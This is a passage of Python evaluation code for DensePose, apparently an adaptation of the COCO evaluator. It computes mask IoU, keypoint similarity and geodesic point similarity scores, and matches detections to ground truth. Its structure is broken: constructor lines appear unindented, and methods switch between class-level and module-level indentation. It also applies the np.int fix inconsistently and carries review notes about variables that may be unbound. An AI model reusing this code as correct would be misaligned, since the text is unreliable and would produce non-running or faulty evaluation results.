self.params = {} # evaluation parameters
self.evalImgs = defaultdict(list) # per-image per-category eval results [KxAxI]
self.eval = {} # accumulated evaluation results
self._gts = defaultdict(list) # gt for evaluation
self._dts = defaultdict(list) # dt for evaluation
self.params = Params(iouType=iouType) # parameters
self._paramsEval = {} # parameters for evaluation
self.stats = [] # result summarization
self.ious = {} # ious between all gts and dts
if cocoGt is not None:
self.params.imgIds = sorted(cocoGt.getImgIds())
self.params.catIds = sorted(cocoGt.getCatIds())
self.ignoreThrBB = 0.7
self.ignoreThrUV = 0.9
    def _loadGEval(self):
        """Download (or fetch from cache) and unpack the SMPL geodesic data
        used by the GPS metric: per-part UV lookup tables, the vertex index
        transform, and the pairwise geodesic distance matrix."""
        smpl_subdiv_fpath = PathManager.get_local_path(
            "https://dl.fbaipublicfiles.com/densepose/data/SMPL_subdiv.mat"
        )
        pdist_transform_fpath = PathManager.get_local_path(
            "https://dl.fbaipublicfiles.com/densepose/data/SMPL_SUBDIV_TRANSFORM.mat"
        )
        pdist_matrix_fpath = PathManager.get_local_path(
            "https://dl.fbaipublicfiles.com/densepose/data/Pdist_matrix.pkl", timeout_sec=120
        )
        SMPL_subdiv = loadmat(smpl_subdiv_fpath)
        self.PDIST_transform = loadmat(pdist_transform_fpath)
        self.PDIST_transform = self.PDIST_transform["index"].squeeze()
        # 2 x V array of (U, V) coordinates for all subdivided SMPL vertices.
        UV = np.array([SMPL_subdiv["U_subdiv"], SMPL_subdiv["V_subdiv"]]).squeeze()
        ClosestVertInds = np.arange(UV.shape[1]) + 1  # 1-based vertex indices
        # Group UVs and vertex indices by the 24 DensePose body parts.
        self.Part_UVs = []
        self.Part_ClosestVertInds = []
        for i in np.arange(24):
            self.Part_UVs.append(UV[:, SMPL_subdiv["Part_ID_subdiv"].squeeze() == (i + 1)])
            self.Part_ClosestVertInds.append(
                ClosestVertInds[SMPL_subdiv["Part_ID_subdiv"].squeeze() == (i + 1)]
            )

        # latin1 encoding: the pickle was produced with Python 2.
        with open(pdist_matrix_fpath, "rb") as hFile:
            arrays = pickle.load(hFile, encoding="latin1")
        self.Pdist_matrix = arrays["Pdist_matrix"]
        self.Part_ids = np.array(SMPL_subdiv["Part_ID_subdiv"].squeeze())
        # Mean geodesic distances for parts.
        self.Mean_Distances = np.array([0, 0.351, 0.107, 0.126, 0.237, 0.173, 0.142, 0.128, 0.150])
        # Coarse Part labels.
        self.CoarseParts = np.array(
            [0, 1, 1, 2, 2, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8]
        )
    def _prepare(self):
        """
        Prepare ._gts and ._dts for evaluation based on params
        :return: None
        """

        def _toMask(anns, coco):
            # Convert polygon/uncompressed segmentations to RLE in place.
            # modify ann['segmentation'] by reference
            for ann in anns:
                # safeguard for invalid segmentation annotation;
                # annotations containing empty lists exist in the posetrack
                # dataset. This is not a correct segmentation annotation
                # in terms of COCO format; we need to deal with it somehow
                segm = ann["segmentation"]
                if type(segm) == list and len(segm) == 0:
                    ann["segmentation"] = None
                    continue
                rle = coco.annToRLE(ann)
                ann["segmentation"] = rle

        def _getIgnoreRegion(iid, coco):
            # Decode the per-image ignore-region polygons into one binary
            # mask; returns None if the image defines no ignore regions.
            img = coco.imgs[iid]

            if "ignore_regions_x" not in img.keys():
                return None

            if len(img["ignore_regions_x"]) == 0:
                return None

            # Interleave x/y coordinate lists into flat [x0, y0, x1, y1, ...]
            # polygons as expected by maskUtils.frPyObjects.
            rgns_merged = [
                [v for xy in zip(region_x, region_y) for v in xy]
                for region_x, region_y in zip(img["ignore_regions_x"], img["ignore_regions_y"])
            ]
            rles = maskUtils.frPyObjects(rgns_merged, img["height"], img["width"])
            rle = maskUtils.merge(rles)
            return maskUtils.decode(rle)

        def _checkIgnore(dt, iregion):
            # Return True if the annotation should be kept, False if it lies
            # (mostly) inside the image's ignore region.
            if iregion is None:
                return True

            bb = np.array(dt["bbox"]).astype(np.int)
            x1, y1, x2, y2 = bb[0], bb[1], bb[0] + bb[2], bb[1] + bb[3]
            x2 = min([x2, iregion.shape[1]])
            y2 = min([y2, iregion.shape[0]])

            if bb[2] * bb[3] == 0:
                return False

            crop_iregion = iregion[y1:y2, x1:x2]

            if crop_iregion.sum() == 0:
                return True

            if "densepose" not in dt.keys():  # filtering boxes
                return crop_iregion.sum() / bb[2] / bb[3] < self.ignoreThrBB

            # filtering UVs
            ignoremask = np.require(crop_iregion, requirements=["F"])
            mask = self._extract_mask(dt)
            uvmask = np.require(np.asarray(mask > 0), dtype=np.uint8, requirements=["F"])
            uvmask_ = maskUtils.encode(uvmask)
            ignoremask_ = maskUtils.encode(ignoremask)
            uviou = maskUtils.iou([uvmask_], [ignoremask_], [1])[0]
            return uviou < self.ignoreThrUV

        p = self.params

        if p.useCats:
            gts = self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
            dts = self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
        else:
            gts = self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds))
            dts = self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds))

        # Cache image sizes for later mask rasterization.
        imns = self.cocoGt.loadImgs(p.imgIds)
        self.size_mapping = {}
        for im in imns:
            self.size_mapping[im["id"]] = [im["height"], im["width"]]

        # if iouType == 'uv', add point gt annotations
        if p.iouType == "densepose":
            self._loadGEval()

        # convert ground truth to mask if iouType == 'segm'
        if p.iouType == "segm":
            _toMask(gts, self.cocoGt)
            _toMask(dts, self.cocoDt)

        # set ignore flag
        for gt in gts:
            gt["ignore"] = gt["ignore"] if "ignore" in gt else 0
            gt["ignore"] = "iscrowd" in gt and gt["iscrowd"]
            if p.iouType == "keypoints":
                gt["ignore"] = (gt["num_keypoints"] == 0) or gt["ignore"]
            if p.iouType == "densepose":
                gt["ignore"] = ("dp_x" in gt) == 0
            if p.iouType == "segm":
                gt["ignore"] = gt["segmentation"] is None

        self._gts = defaultdict(list)  # gt for evaluation
        self._dts = defaultdict(list)  # dt for evaluation
        self._igrgns = defaultdict(list)  # per-image ignore-region masks

        for gt in gts:
            iid = gt["image_id"]
            if iid not in self._igrgns.keys():
                self._igrgns[iid] = _getIgnoreRegion(iid, self.cocoGt)
            if _checkIgnore(gt, self._igrgns[iid]):
                self._gts[iid, gt["category_id"]].append(gt)

        for dt in dts:
            iid = dt["image_id"]
            if (iid not in self._igrgns) or _checkIgnore(dt, self._igrgns[iid]):
                self._dts[iid, dt["category_id"]].append(dt)

        self.evalImgs = defaultdict(list)  # per-image per-category evaluation results
        self.eval = {}  # accumulated evaluation results
    def evaluate(self):
        """
        Run per image evaluation on given images and store results (a list of dict) in self.evalImgs
        :return: None
        """
        tic = time.time()
        logger.info("Running per image DensePose evaluation... {}".format(self.params.iouType))
        p = self.params
        # add backward compatibility if useSegm is specified in params
        if p.useSegm is not None:
            p.iouType = "segm" if p.useSegm == 1 else "bbox"
            logger.info("useSegm (deprecated) is not None. Running DensePose evaluation")
        p.imgIds = list(np.unique(p.imgIds))
        if p.useCats:
            p.catIds = list(np.unique(p.catIds))
        p.maxDets = sorted(p.maxDets)
        self.params = p

        self._prepare()
        # loop through images, area range, max detection number
        catIds = p.catIds if p.useCats else [-1]

        # Select the per-(image, category) similarity function for this task.
        if p.iouType in ["segm", "bbox"]:
            computeIoU = self.computeIoU
        elif p.iouType == "keypoints":
            computeIoU = self.computeOks
        elif p.iouType == "densepose":
            computeIoU = self.computeOgps
            if self._dpEvalMode == DensePoseEvalMode.GPSM:
                # GPSM additionally needs plain mask IoUs, cached separately.
                self.real_ious = {
                    (imgId, catId): self.computeDPIoU(imgId, catId)
                    for imgId in p.imgIds
                    for catId in catIds
                }

        # pdb.set_trace()
        self.ious = {
            (imgId, catId): computeIoU(imgId, catId) for imgId in p.imgIds for catId in catIds
        }

        evaluateImg = self.evaluateImg
        maxDet = p.maxDets[-1]
        self.evalImgs = [
            evaluateImg(imgId, catId, areaRng, maxDet)
            for catId in catIds
            for areaRng in p.areaRng
            for imgId in p.imgIds
        ]
        self._paramsEval = copy.deepcopy(self.params)
        toc = time.time()
        logger.info("DensePose evaluation DONE (t={:0.2f}s).".format(toc - tic))
def getDensePoseMask(self, polys):
    """Combine up to 14 per-part RLE encodings into one 256x256 label mask.

    Part ``i`` (1-based) is painted with value ``i`` wherever its decoded
    mask is non-zero; later parts overwrite earlier ones on overlap.
    Empty / falsy entries in ``polys`` are skipped.
    """
    labels = np.zeros([256, 256])
    n_parts = min(len(polys) + 1, 15)
    for part_id in range(1, n_parts):
        encoded = polys[part_id - 1]
        if not encoded:
            continue
        decoded = maskUtils.decode(encoded)
        labels[decoded > 0] = part_id
    return labels
def _generate_rlemask_on_image(self, mask, imgId, data):
    """Paste a box-local binary mask into full-image coordinates and RLE-encode it.

    :param mask: 2D box-local mask array, or None to produce an all-empty mask
    :param imgId: image id, used to look up (im_h, im_w) in self.size_mapping
    :param data: annotation dict; only its "bbox" (x, y, w, h) is read
    :return: compressed COCO RLE of the mask on an im_h x im_w canvas
    """
    bbox_xywh = np.array(data["bbox"])
    x, y, w, h = bbox_xywh
    im_h, im_w = self.size_mapping[imgId]
    im_mask = np.zeros((im_h, im_w), dtype=np.uint8)
    if mask is not None:
        # clip the destination region to both the image bounds and the mask extent
        x0 = max(int(x), 0)
        x1 = min(int(x + w), im_w, int(x) + mask.shape[1])
        y0 = max(int(y), 0)
        y1 = min(int(y + h), im_h, int(y) + mask.shape[0])
        y = int(y)
        x = int(x)
        # source indices are the destination range shifted back by the box origin
        im_mask[y0:y1, x0:x1] = mask[y0 - y : y1 - y, x0 - x : x1 - x]
    im_mask = np.require(np.asarray(im_mask > 0), dtype=np.uint8, requirements=["F"])
    # pycocotools encode expects a Fortran-ordered HxWx1 uint8 array
    rle_mask = maskUtils.encode(np.array(im_mask[:, :, np.newaxis], order="F"))[0]
    return rle_mask
def computeDPIoU(self, imgId, catId):
    """Compute mask IoU between detections and ground truth for one image/category.

    Ground-truth masks come from the DensePose segmentation when present,
    otherwise from the COCO "segmentation" field (polygon list, uncompressed
    RLE, or compressed RLE); detections use the mask extracted from the
    DensePose / CSE result.
    :return: DxG IoU matrix, or [] when there is nothing to compare
    """
    p = self.params
    if p.useCats:
        gt = self._gts[imgId, catId]
        dt = self._dts[imgId, catId]
    else:
        gt = [_ for cId in p.catIds for _ in self._gts[imgId, cId]]
        dt = [_ for cId in p.catIds for _ in self._dts[imgId, cId]]
    if len(gt) == 0 and len(dt) == 0:
        return []
    # sort detections by descending score and keep at most maxDets[-1]
    inds = np.argsort([-d["score"] for d in dt], kind="mergesort")
    dt = [dt[i] for i in inds]
    if len(dt) > p.maxDets[-1]:
        dt = dt[0 : p.maxDets[-1]]

    gtmasks = []
    for g in gt:
        if DensePoseDataRelative.S_KEY in g:
            # convert DensePose mask to a binary mask
            mask = np.minimum(self.getDensePoseMask(g[DensePoseDataRelative.S_KEY]), 1.0)
            _, _, w, h = g["bbox"]
            # resize the 256x256 chart mask to the ground-truth box size
            scale_x = float(max(w, 1)) / mask.shape[1]
            scale_y = float(max(h, 1)) / mask.shape[0]
            mask = spzoom(mask, (scale_y, scale_x), order=1, prefilter=False)
            mask = np.array(mask > 0.5, dtype=np.uint8)
            rle_mask = self._generate_rlemask_on_image(mask, imgId, g)
        elif "segmentation" in g:
            segmentation = g["segmentation"]
            if isinstance(segmentation, list) and segmentation:
                # polygons
                im_h, im_w = self.size_mapping[imgId]
                rles = maskUtils.frPyObjects(segmentation, im_h, im_w)
                rle_mask = maskUtils.merge(rles)
            elif isinstance(segmentation, dict):
                if isinstance(segmentation["counts"], list):
                    # uncompressed RLE
                    im_h, im_w = self.size_mapping[imgId]
                    rle_mask = maskUtils.frPyObjects(segmentation, im_h, im_w)
                else:
                    # compressed RLE
                    rle_mask = segmentation
            else:
                # unsupported segmentation payload -> empty mask
                rle_mask = self._generate_rlemask_on_image(None, imgId, g)
        else:
            # no segmentation data at all -> empty mask
            rle_mask = self._generate_rlemask_on_image(None, imgId, g)
        gtmasks.append(rle_mask)

    dtmasks = []
    for d in dt:
        mask = self._extract_mask(d)
        mask = np.require(np.asarray(mask > 0), dtype=np.uint8, requirements=["F"])
        rle_mask = self._generate_rlemask_on_image(mask, imgId, d)
        dtmasks.append(rle_mask)

    # compute iou between each dt and gt region; crowd GT is matched with
    # "intersection over detection area" semantics inside maskUtils.iou
    iscrowd = [int(o.get("iscrowd", 0)) for o in gt]
    iousDP = maskUtils.iou(dtmasks, gtmasks, iscrowd)
    return iousDP
def computeIoU(self, imgId, catId):
    """Standard COCO IoU (bbox or segm) between detections and ground truth.

    :return: DxG IoU matrix, or [] when the image/category pair is empty
    """
    params = self.params
    if params.useCats:
        gt = self._gts[imgId, catId]
        dt = self._dts[imgId, catId]
    else:
        gt = [ann for cId in params.catIds for ann in self._gts[imgId, cId]]
        dt = [ann for cId in params.catIds for ann in self._dts[imgId, cId]]
    if not gt and not dt:
        return []

    # highest-scoring detections first, truncated to the largest budget
    order = np.argsort([-det["score"] for det in dt], kind="mergesort")
    dt = [dt[i] for i in order][: params.maxDets[-1]]

    if params.iouType == "segm":
        gt_regions = [ann["segmentation"] for ann in gt if ann["segmentation"] is not None]
        dt_regions = [ann["segmentation"] for ann in dt if ann["segmentation"] is not None]
    elif params.iouType == "bbox":
        gt_regions = [ann["bbox"] for ann in gt]
        dt_regions = [ann["bbox"] for ann in dt]
    else:
        raise Exception("unknown iouType for iou computation")

    # crowd ground truth is matched with "intersection over detection area"
    iscrowd = [int(ann.get("iscrowd", 0)) for ann in gt]
    return maskUtils.iou(dt_regions, gt_regions, iscrowd)
def computeOks(self, imgId, catId):
    """Compute COCO Object Keypoint Similarity (OKS) between detections and GT.

    :return: DxG matrix of OKS values, or [] when either side is empty
    """
    p = self.params
    # dimension here should be Nxm
    gts = self._gts[imgId, catId]
    dts = self._dts[imgId, catId]
    inds = np.argsort([-d["score"] for d in dts], kind="mergesort")
    dts = [dts[i] for i in inds]
    if len(dts) > p.maxDets[-1]:
        dts = dts[0 : p.maxDets[-1]]
    if len(gts) == 0 or len(dts) == 0:
        return []
    ious = np.zeros((len(dts), len(gts)))
    # per-keypoint falloff constants (COCO keypoint evaluation), scaled by 1/10
    sigmas = (
        np.array(
            [
                0.26,
                0.25,
                0.25,
                0.35,
                0.35,
                0.79,
                0.79,
                0.72,
                0.72,
                0.62,
                0.62,
                1.07,
                1.07,
                0.87,
                0.87,
                0.89,
                0.89,
            ]
        )
        / 10.0
    )
    vars = (sigmas * 2) ** 2
    k = len(sigmas)
    # compute oks between each detection and ground truth object
    for j, gt in enumerate(gts):
        # create bounds for ignore regions(double the gt bbox)
        g = np.array(gt["keypoints"])
        xg = g[0::3]
        yg = g[1::3]
        vg = g[2::3]  # visibility flags
        k1 = np.count_nonzero(vg > 0)
        bb = gt["bbox"]
        x0 = bb[0] - bb[2]
        x1 = bb[0] + bb[2] * 2
        y0 = bb[1] - bb[3]
        y1 = bb[1] + bb[3] * 2
        for i, dt in enumerate(dts):
            d = np.array(dt["keypoints"])
            xd = d[0::3]
            yd = d[1::3]
            if k1 > 0:
                # measure the per-keypoint distance if keypoints visible
                dx = xd - xg
                dy = yd - yg
            else:
                # measure minimum distance to keypoints in (x0,y0) & (x1,y1)
                z = np.zeros(k)
                dx = np.max((z, x0 - xd), axis=0) + np.max((z, xd - x1), axis=0)
                dy = np.max((z, y0 - yd), axis=0) + np.max((z, yd - y1), axis=0)
            # normalized squared distance -> per-keypoint gaussian similarity
            e = (dx ** 2 + dy ** 2) / vars / (gt["area"] + np.spacing(1)) / 2
            if k1 > 0:
                # average only over keypoints that are labeled visible
                e = e[vg > 0]
            ious[i, j] = np.sum(np.exp(-e)) / e.shape[0]
    return ious
def _extract_mask(self, dt: Dict[str, Any]) -> np.ndarray:
    """Return the foreground mask of one detection.

    Supports chart-based results (channel 0 of the quantized DensePose
    output ``labels_uv_uint8``) and CSE results (``"cse_mask"``).

    :raises ValueError: if the detection carries neither kind of mask.
        (The previous code implicitly returned None here, which crashed
        later in the caller with an opaque TypeError.)
    """
    if "densepose" in dt:
        densepose_results_quantized = dt["densepose"]
        return densepose_results_quantized.labels_uv_uint8[0].numpy()
    elif "cse_mask" in dt:
        return dt["cse_mask"]
    raise ValueError("detection dict contains neither 'densepose' nor 'cse_mask'")
def _extract_iuv(
    self, densepose_data: np.ndarray, py: np.ndarray, px: np.ndarray, gt: Dict[str, Any]
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
    """
    Extract arrays of I, U and V values at given points as numpy arrays
    given the data mode stored in self._dpDataMode.

    :param densepose_data: quantized IUV tensor; channel 0 holds part labels,
        channels 1/2 hold U/V encoded as uint8 (divide by 255 to decode)
    :param py, px: integer pixel coordinates of the sampled points
    :param gt: ground-truth annotation supplying dp_I/dp_U/dp_V when needed
    :return: tuple (ipoints, upoints, vpoints)
    :raises ValueError: for an unknown data mode
    """
    if self._dpDataMode == DensePoseDataMode.IUV_DT:
        # estimated labels and UV (default)
        ipoints = densepose_data[0, py, px]
        upoints = densepose_data[1, py, px] / 255.0  # convert from uint8 by /255.
        vpoints = densepose_data[2, py, px] / 255.0
    elif self._dpDataMode == DensePoseDataMode.IUV_GT:
        # ground truth
        ipoints = np.array(gt["dp_I"])
        upoints = np.array(gt["dp_U"])
        vpoints = np.array(gt["dp_V"])
    elif self._dpDataMode == DensePoseDataMode.I_GT_UV_0:
        # ground truth labels, UV = 0
        # bug fix: the previous code computed `upoints = upoints * 0.0` before
        # `upoints` was ever assigned, raising UnboundLocalError in this mode
        ipoints = np.array(gt["dp_I"])
        upoints = np.zeros_like(ipoints, dtype=float)
        vpoints = np.zeros_like(ipoints, dtype=float)
    elif self._dpDataMode == DensePoseDataMode.I_GT_UV_DT:
        # ground truth labels, estimated UV
        ipoints = np.array(gt["dp_I"])
        upoints = densepose_data[1, py, px] / 255.0  # convert from uint8 by /255.
        vpoints = densepose_data[2, py, px] / 255.0
    elif self._dpDataMode == DensePoseDataMode.I_DT_UV_0:
        # estimated labels, UV = 0 (same UnboundLocalError fix as above)
        ipoints = densepose_data[0, py, px]
        upoints = np.zeros_like(ipoints, dtype=float)
        vpoints = np.zeros_like(ipoints, dtype=float)
    else:
        raise ValueError(f"Unknown data mode: {self._dpDataMode}")
    return ipoints, upoints, vpoints
def computeOgps(self, imgId, catId):
    """Compute Geodesic Point Similarity (GPS) between detections and GT.

    For each (detection, ground truth) pair the annotated GT points are
    projected into the detection box, mapped to their closest mesh vertices
    (chart-based IUV or CSE embedding), and the geodesic distances between
    GT and predicted vertices are converted into a similarity score.

    :return: tuple (ious, ious_bb) -- the DxG GPS matrix and the DxG plain
        bbox IoU matrix; [] when either side is empty (callers check len()).
    """
    p = self.params
    # dimension here should be Nxm
    g = self._gts[imgId, catId]
    d = self._dts[imgId, catId]
    inds = np.argsort([-d_["score"] for d_ in d], kind="mergesort")
    d = [d[i] for i in inds]
    if len(d) > p.maxDets[-1]:
        d = d[0 : p.maxDets[-1]]
    if len(g) == 0 or len(d) == 0:
        return []
    ious = np.zeros((len(d), len(g)))
    # compute opgs between each detection and ground truth object
    # sigma = self.sigma #0.255 # dist = 0.3m corresponds to ogps = 0.5
    # 1 # dist = 0.3m corresponds to ogps = 0.96
    # 1.45 # dist = 1.7m (person height) corresponds to ogps = 0.5)
    for j, gt in enumerate(g):
        if not gt["ignore"]:
            g_ = gt["bbox"]
            for i, dt in enumerate(d):
                dy = int(dt["bbox"][3])
                dx = int(dt["bbox"][2])
                # GT points are stored normalized to a 0..255 box frame;
                # rescale to GT-box pixels, then shift into the detection box
                dp_x = np.array(gt["dp_x"]) * g_[2] / 255.0
                dp_y = np.array(gt["dp_y"]) * g_[3] / 255.0
                # bug fix: use builtin int -- np.int was removed in NumPy 1.24
                py = (dp_y + g_[1] - dt["bbox"][1]).astype(int)
                px = (dp_x + g_[0] - dt["bbox"][0]).astype(int)
                # mark points that fall outside the detection box with -1
                pts = np.zeros(len(px))
                pts[px >= dx] = -1
                pts[py >= dy] = -1
                pts[px < 0] = -1
                pts[py < 0] = -1
                if len(pts) < 1:
                    ogps = 0.0
                elif np.max(pts) == -1:
                    # every annotated point lies outside the detection box
                    ogps = 0.0
                else:
                    # clamp out-of-box indices so array indexing stays valid
                    px[pts == -1] = 0
                    py[pts == -1] = 0
                    # Find closest vertices in subsampled mesh.
                    # NOTE(review): assumes dt carries either "densepose" or
                    # "cse_indices"; otherwise `dist` below is undefined -- confirm
                    if "densepose" in dt:
                        cVertsGT, ClosestVertsGTTransformed = self.findAllClosestVertsGT(gt)
                        densepose_results_quantized = dt["densepose"]
                        ipoints, upoints, vpoints = self._extract_iuv(
                            densepose_results_quantized.labels_uv_uint8.numpy(), py, px, gt
                        )
                        ipoints[pts == -1] = 0
                        cVerts = self.findAllClosestVertsUV(upoints, vpoints, ipoints)
                        # Get pairwise geodesic distances between gt and estimated mesh points.
                        dist = self.getDistancesUV(ClosestVertsGTTransformed, cVerts)
                        # Compute the Ogps measure.
                        # Find the mean geodesic normalization distance for
                        # each GT point, based on which part it is on.
                        Current_Mean_Distances = self.Mean_Distances[
                            self.CoarseParts[
                                self.Part_ids[cVertsGT[cVertsGT > 0].astype(int) - 1]
                            ]
                        ]
                    elif "cse_indices" in dt:
                        cVertsGT = np.array(gt["dp_vertex"])
                        cse_mask, cse_indices = dt["cse_mask"], dt["cse_indices"]
                        cVerts = self.findAllClosestVertsCSE(
                            cse_indices[py, px],
                            cse_mask[py, px],
                        )
                        # Get pairwise geodesic distances between gt and estimated mesh points.
                        dist = self.getDistancesCSE(cVertsGT, cVerts, gt["ref_model"])
                        Current_Mean_Distances = self.Mean_Distances[
                            self.CoarseParts[np.array(gt["dp_I"], dtype=int)]
                        ]
                    # Compute gps: gaussian of geodesic distance, normalized per part
                    ogps_values = np.exp(-(dist ** 2) / (2 * (Current_Mean_Distances ** 2)))
                    # NOTE(review): when dist is empty, ogps keeps its value from
                    # the previous iteration (or is unbound on the first one) --
                    # behavior preserved from the original
                    if len(dist) > 0:
                        ogps = np.sum(ogps_values) / len(dist)
                ious[i, j] = ogps
    gbb = [gt["bbox"] for gt in g]
    dbb = [dt["bbox"] for dt in d]
    # compute iou between each dt and gt region
    iscrowd = [int(o.get("iscrowd", 0)) for o in g]
    ious_bb = maskUtils.iou(dbb, gbb, iscrowd)
    return ious, ious_bb
def evaluateImg(self, imgId, catId, aRng, maxDet):
    """
    perform evaluation for single category and image
    :return: dict (single image results), or None when there is nothing to match
    """
    p = self.params
    if p.useCats:
        gt = self._gts[imgId, catId]
        dt = self._dts[imgId, catId]
    else:
        gt = [_ for cId in p.catIds for _ in self._gts[imgId, cId]]
        dt = [_ for cId in p.catIds for _ in self._dts[imgId, cId]]
    if len(gt) == 0 and len(dt) == 0:
        return None
    for g in gt:
        # flag GT that is explicitly ignored or outside the requested area range
        if g["ignore"] or (g["area"] < aRng[0] or g["area"] > aRng[1]):
            g["_ignore"] = True
        else:
            g["_ignore"] = False
    # sort dt highest score first, sort gt ignore last
    gtind = np.argsort([g["_ignore"] for g in gt], kind="mergesort")
    gt = [gt[i] for i in gtind]
    dtind = np.argsort([-d["score"] for d in dt], kind="mergesort")
    dt = [dt[i] for i in dtind[0:maxDet]]
    iscrowd = [int(o.get("iscrowd", 0)) for o in gt]
    # load computed ious
    if p.iouType == "densepose":
        # computeOgps returns (gps_matrix, bbox_iou_matrix); reorder the
        # columns of both to match the ignore-sorted gt list
        ious = (
            self.ious[imgId, catId][0][:, gtind]
            if len(self.ious[imgId, catId]) > 0
            else self.ious[imgId, catId]
        )
        ioubs = (
            self.ious[imgId, catId][1][:, gtind]
            if len(self.ious[imgId, catId]) > 0
            else self.ious[imgId, catId]
        )
        if self._dpEvalMode == DensePoseEvalMode.GPSM:
            iousM = (
                self.real_ious[imgId, catId][:, gtind]
                if len(self.real_ious[imgId, catId]) > 0
                else self.real_ious[imgId, catId]
            )
        # NOTE(review): the matching loop below also reads iousM in
        # DensePoseEvalMode.IOU, but iousM is only assigned here in GPSM
        # mode -- confirm IOU mode is wired up before relying on it
    else:
        ious = (
            self.ious[imgId, catId][:, gtind]
            if len(self.ious[imgId, catId]) > 0
            else self.ious[imgId, catId]
        )

    T = len(p.iouThrs)
    G = len(gt)
    D = len(dt)
    gtm = np.zeros((T, G))   # per-threshold: id of the dt matched to each gt (0 = none)
    dtm = np.zeros((T, D))   # per-threshold: id of the gt matched to each dt (0 = none)
    gtIg = np.array([g["_ignore"] for g in gt])
    dtIg = np.zeros((T, D))  # per-threshold ignore flags for detections
    if np.all(gtIg) and p.iouType == "densepose":
        # every gt is ignored -> no detection can count as a false positive
        dtIg = np.logical_or(dtIg, True)

    if len(ious) > 0:  # and not p.iouType == 'densepose':
        for tind, t in enumerate(p.iouThrs):
            for dind, d in enumerate(dt):
                # information about best match so far (m=-1 -> unmatched)
                iou = min([t, 1 - 1e-10])
                m = -1
                for gind, _g in enumerate(gt):
                    # if this gt already matched, and not a crowd, continue
                    if gtm[tind, gind] > 0 and not iscrowd[gind]:
                        continue
                    # if dt matched to reg gt, and on ignore gt, stop
                    if m > -1 and gtIg[m] == 0 and gtIg[gind] == 1:
                        break
                    if p.iouType == "densepose":
                        if self._dpEvalMode == DensePoseEvalMode.GPSM:
                            # geometric mean of GPS and mask IoU
                            new_iou = np.sqrt(iousM[dind, gind] * ious[dind, gind])
                        elif self._dpEvalMode == DensePoseEvalMode.IOU:
                            new_iou = iousM[dind, gind]
                        elif self._dpEvalMode == DensePoseEvalMode.GPS:
                            new_iou = ious[dind, gind]
                    else:
                        new_iou = ious[dind, gind]
                    if new_iou < iou:
                        continue
                    if new_iou == 0.0:
                        continue
                    # if match successful and best so far, store appropriately
                    iou = new_iou
                    m = gind
                # if match made store id of match for both dt and gt
                if m == -1:
                    continue
                dtIg[tind, dind] = gtIg[m]
                dtm[tind, dind] = gt[m]["id"]
                gtm[tind, m] = d["id"]
            if p.iouType == "densepose":
                if not len(ioubs) == 0:
                    # second pass: attach still-unmatched detections to *ignored*
                    # gt by plain bbox IoU (>= 0.8) so they are not counted as FPs
                    for dind, d in enumerate(dt):
                        # information about best match so far (m=-1 -> unmatched)
                        if dtm[tind, dind] == 0:
                            ioub = 0.8
                            m = -1
                            for gind, _g in enumerate(gt):
                                # if this gt already matched, and not a crowd, continue
                                if gtm[tind, gind] > 0 and not iscrowd[gind]:
                                    continue
                                # continue to next gt unless better match made
                                if ioubs[dind, gind] < ioub:
                                    continue
                                # if match successful and best so far, store appropriately
                                ioub = ioubs[dind, gind]
                                m = gind
                            # if match made store id of match for both dt and gt
                            if m > -1:
                                dtIg[:, dind] = gtIg[m]
                                if gtIg[m]:
                                    dtm[tind, dind] = gt[m]["id"]
                                    gtm[tind, m] = d["id"]
    # set unmatched detections outside of area range to ignore
    a = np.array([d["area"] < aRng[0] or d["area"] > aRng[1] for d in dt]).reshape((1, len(dt)))
    dtIg = np.logical_or(dtIg, np.logical_and(dtm == 0, np.repeat(a, T, 0)))
    # store results for given image and category
    return {
        "image_id": imgId,
        "category_id": catId,
        "aRng": aRng,
        "maxDet": maxDet,
        "dtIds": [d["id"] for d in dt],
        "gtIds": [g["id"] for g in gt],
        "dtMatches": dtm,
        "gtMatches": gtm,
        "dtScores": [d["score"] for d in dt],
        "gtIgnore": gtIg,
        "dtIgnore": dtIg,
    }
def accumulate(self, p=None):
    """
    Accumulate per image evaluation results and store the result in self.eval
    :param p: input params for evaluation
    :return: None
    """
    logger.info("Accumulating evaluation results...")
    tic = time.time()
    if not self.evalImgs:
        logger.info("Please run evaluate() first")
    # allows input customized parameters
    if p is None:
        p = self.params
    p.catIds = p.catIds if p.useCats == 1 else [-1]
    T = len(p.iouThrs)
    R = len(p.recThrs)
    K = len(p.catIds) if p.useCats else 1
    A = len(p.areaRng)
    M = len(p.maxDets)
    precision = -(np.ones((T, R, K, A, M)))  # -1 for the precision of absent categories
    recall = -(np.ones((T, K, A, M)))
    # create dictionary for future indexing
    logger.info("Categories: {}".format(p.catIds))
    _pe = self._paramsEval
    catIds = _pe.catIds if _pe.useCats else [-1]
    setK = set(catIds)
    setA = set(map(tuple, _pe.areaRng))
    setM = set(_pe.maxDets)
    setI = set(_pe.imgIds)
    # get inds to evaluate
    k_list = [n for n, k in enumerate(p.catIds) if k in setK]
    m_list = [m for n, m in enumerate(p.maxDets) if m in setM]
    a_list = [n for n, a in enumerate(map(lambda x: tuple(x), p.areaRng)) if a in setA]
    i_list = [n for n, i in enumerate(p.imgIds) if i in setI]
    I0 = len(_pe.imgIds)
    A0 = len(_pe.areaRng)
    # retrieve E at each category, area range, and max number of detections
    for k, k0 in enumerate(k_list):
        Nk = k0 * A0 * I0  # evalImgs is laid out as [category][area range][image]
        for a, a0 in enumerate(a_list):
            Na = a0 * I0
            for m, maxDet in enumerate(m_list):
                E = [self.evalImgs[Nk + Na + i] for i in i_list]
                E = [e for e in E if e is not None]
                if len(E) == 0:
                    continue
                dtScores = np.concatenate([e["dtScores"][0:maxDet] for e in E])
                # different sorting method generates slightly different results.
                # mergesort is used to be consistent as Matlab implementation.
                inds = np.argsort(-dtScores, kind="mergesort")
                dtm = np.concatenate([e["dtMatches"][:, 0:maxDet] for e in E], axis=1)[:, inds]
                dtIg = np.concatenate([e["dtIgnore"][:, 0:maxDet] for e in E], axis=1)[:, inds]
                gtIg = np.concatenate([e["gtIgnore"] for e in E])
                npig = np.count_nonzero(gtIg == 0)
                if npig == 0:
                    continue
                tps = np.logical_and(dtm, np.logical_not(dtIg))
